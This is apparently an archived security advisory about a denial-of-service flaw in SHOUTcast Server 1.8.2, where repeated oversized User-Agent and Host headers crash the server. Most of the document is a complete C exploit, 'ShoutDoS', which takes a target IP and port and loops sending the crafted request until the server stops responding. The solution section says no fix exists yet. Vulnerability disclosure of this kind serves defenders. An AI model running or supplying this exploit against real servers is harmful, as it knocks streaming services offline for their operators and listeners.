COMMAND
WinAMP
SYSTEMS AFFECTED
SHOUTcast Server 1.8.2 Linux/win32/?
PROBLEM
'FraMe' found following. SHOUTcast Server is a streaming audio
server. A "bad" client request can crash the server.
Server crash when it gets seven times (aprox) a very long
buffer (4KB) in fields: User-Agent and Host, in the client HTTP
request.
The DoS in C format is attached.
/*
* ShoutDoS: Remote Denial of Service SHOUTcast Server
*
* ShoutDoS (C) 2001 FraMe <frame@hispalab.com>
*
* Tested:
* SHOUTcast Server 1.8.2 Linux
* SHOUTcast Server 1.8.2 Win32
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/errno.h>
void msg(void) {
printf("ShoutDoS: Remote Denial of Service SHOUTcast Server\n");
printf("ShoutDoS (C) 2001 FraMe <frame@hispalab.com>\n");
}
int main(int argc,char **argv) {
int s,n=0,c;
struct sockaddr_in sa;
struct hostent *SHOUTserver;
char buffer[]="GET / HTTP/1.0\r\nUser-Agent: SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast
DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService\r\nHost: your.server.go.crash.now.your.server.g o.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.
go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serve r.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv
er.go.crash.now.your.server.go.crash.now.your.server.go.crash.now\r\nAuthorization: Basic\r\n\r\n";
char rbuff[512];
if ( argc != 3 ) {
msg();
printf("Usage: %s ip port\n",*argv);
exit(1);
}
if ((SHOUTserver = gethostbyname(argv[1])) == NULL) {
msg();
printf("Error: gethostbyname()\n");
exit(1);
}
memcpy(&sa.sin_addr.s_addr,SHOUTserver->h_addr,SHOUTserver->h_length);
sa.sin_family = AF_INET;
sa.sin_port = htons(atoi(argv[2]));
if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
msg();
printf("Error: socket()\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
msg();
printf("Error: connect()\n");
exit (1);
}
close(s);
msg();
printf("Connect. The host appears be up...\n");
printf("Doing DoS ");
DoS:
if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
printf(" Error!\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
printf(" Server Crash!\n");
exit (1);
}
write(s,buffer,sizeof(buffer)-1);
read(s,rbuff,sizeof(rbuff));
close(s);
printf(".");
goto DoS; // Basic Power :)
}
/* EOF */
SOLUTION
Nothing yet.